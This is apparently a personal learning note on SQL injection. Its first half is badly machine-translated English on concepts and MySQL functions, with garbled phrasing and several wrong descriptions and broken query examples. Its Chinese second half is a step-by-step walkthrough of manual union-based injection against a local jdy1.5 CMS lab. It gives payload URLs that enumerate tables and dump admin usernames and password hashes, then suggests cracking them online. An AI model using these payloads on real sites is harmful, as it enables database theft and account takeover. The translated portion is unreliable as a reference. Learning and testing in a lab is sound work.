Penetration Testing [white] series of SQL injection

(This article is only normal learning record, if any error please chiefs pointed out that if this article can help you that I am also very happy friends)

 

I. INTRODUCTION

Essence 1.SQL injection vulnerability: the process execution and then back-end code, the user input data as code that can be executed, contrary to the principle of phase separation of code and data

2. Reasons for injection: the parameters can be controlled at the distal end of delivery, the controllable parameters; data transfer from the rear end of the front end without filtration, or filtration imprecise, resulting in SQL injection

3.SQL injection vulnerability has two key conditions:

• Users can control the content input
• Web application the user input into the database to perform

4. Hazards: data leakage, off the library, tampering with the site, destroying database, backdoor, getshell etc.

5. Category:

• Request method: GET POST the cookie
• Parametric form: Pointer type search
• Feedback Type: error union Boolean (page display time or state) Delay
• Database type: Access MySQL MSSQL the Oracle NoSQL, etc.
• The use of technology: within stacked time Boolean error associated joint,

 

Second, the common database functions and constants

1. @@ tmpdir   view the temporary directory

2. @@ datadir  data storage location

3. @@ basedir  location where the database services

4. @@ version  check the version number

5. @@ hostname  view the current user name

() 6.ascii   value Returns the string str leftmost character

7.user ()   Gets Username

8.version ()   to get the current version number

9.database ()   Gets the current database

10.concat ()   connecting a plurality of strings into a string

11.group_concat ()   values to the same group by a packet generated in the connect, the result returns a string

12.concat_ws ()   connecting a plurality of strings into a string

13. interception string:

• substr() oracle mysql mssql
• substring() MySQL mssql
• mid() mysql
• Note: have three parameters, a first character is to be taken, the second is the starting index, the third length is taken
• left (pa1, pa2) pa1 string is taken, taken from the left, the number of bits taken PA2
• right (pa1, pa2) pa1 string is taken, taken from the right, the number of bits taken PA2

15.sleep ()   sleep

16.ord ()  to display ASCII characters

17. Analyzing conditions:

• if (condition, the conditions for the return value of true or statement, the condition is false or return value statement)
• case when conditions then the conditions for the return value of true or false statement else when conditions return value or statements end
  • 如：select 1,case when 1=1 then ‘hello’ else ‘goodbye’ end,3 --+

19.length ()  calculates the length of the string

20. The joint inquiry

• select * from users where id=1 union select “a”,”b”,”c”;
• select * from users where id=0.01 union selcet 1,2,user(),4,@@databases; 

 

Three, MySQL database: a database field is a Schedule III

1. a library: information_schema library storage system libraries, aggregate (other database library name, table names, field names)

2. a table: the Columns table to store data (database names, table names, field names)

3. The three fields:

• table_schema field repository name other databases
• table_name table name field is stored in other databases
• column_name field name field is stored in other databases

1 select table_schema table_name column_name from information_schema.columns;  查询三字段所对应的数据
2 select table_schema table_name column_name from information_schema.columns where table_schema=”dvwa”;  有条件的查询
3 select table_schema table_name column_name from information_schema.columns where table_schema=0x64767761;  将dvwa转为16进制

注：MySQL的版本号需要>5.0

 

四、手工注入

• 测试使用搭建的jdy1.5网站

1.检测注入点：即可能存在SQL注入的地方，找到有类似id（id/uid/key、typeid/sid等等）的参数，后面需要输入一些检测的恶意代码（payload）：' 或 'and 1=1# 或 'and 1=2-- 或 -1' or '1'='1'等等

• 需不需要单引号，是由后端拼接的SQL语句决定的，如（%23是#的URL编码）：

1 SELECT * FROM users WHERE id='$id' LIMIT 0,1
2     前端测试： id=1’ and 1=1%23
3 SELECT * FROM users WHERE id=$id LIMIT 0,1
4     前端测试：id=1 and 1=1%23

• 输入的恶意代码被成功执行（根据页面显示效果以及报错信息等来判断），说明此处有SQL注入点
• 接下来还要判断注入的方式：根据页面的回显效果来决定使用哪种注入技术

• 判断从后台数据库中选择的列数以及哪几列在前端显示

1 http://127.0.0.1/jdy1.5/typeid.php?typeid=1 order by 6#

• 更换数字，根据页面显示效果判断后台数据库选择的列数，5列（信息收集）

1 http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,2,3,4,5%23

• 根据页面显示效果可知在2的位置显示到前端，即可将2替换为SQL语句

2.收集后台数据库信息

1 http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,user(),3,4,5%23  查看当前用户
2 http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,database(),3,4,5%23  查看当前数据库
3 http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select group_concat(distinct table_schema) from information_schema.columns),3,4,5%23
4     distinct  去重
5     group_concat  分组并拼接
6     空格可以用+代替

3.获取当前数据库下的数据表

http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select group_concat(distinct table_name) from information_schema.columns where table_schema=database()),3,4,5%23

4.获取当前数据库下指定表下的字段名

1 http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name=’jdy_admin’),3,4,5%23
2 http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name=0x6a64795f61646d696e),3,4,5%23

• 一般需要找后台或敏感的数据表，0x6a6479636d73是‘jdycms’的16进制转码

5.获取字段数据

1 select concat(username,0x7e,password)from jdy_admin limit 0,1；
2 http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select concat(username,0x7e,password)from jdy_admin limit 0,1),3,4,5%23

6.解密：使用cmd5、pmd5等等

7.找后台登录：可以猜、目录扫描或信息收集等等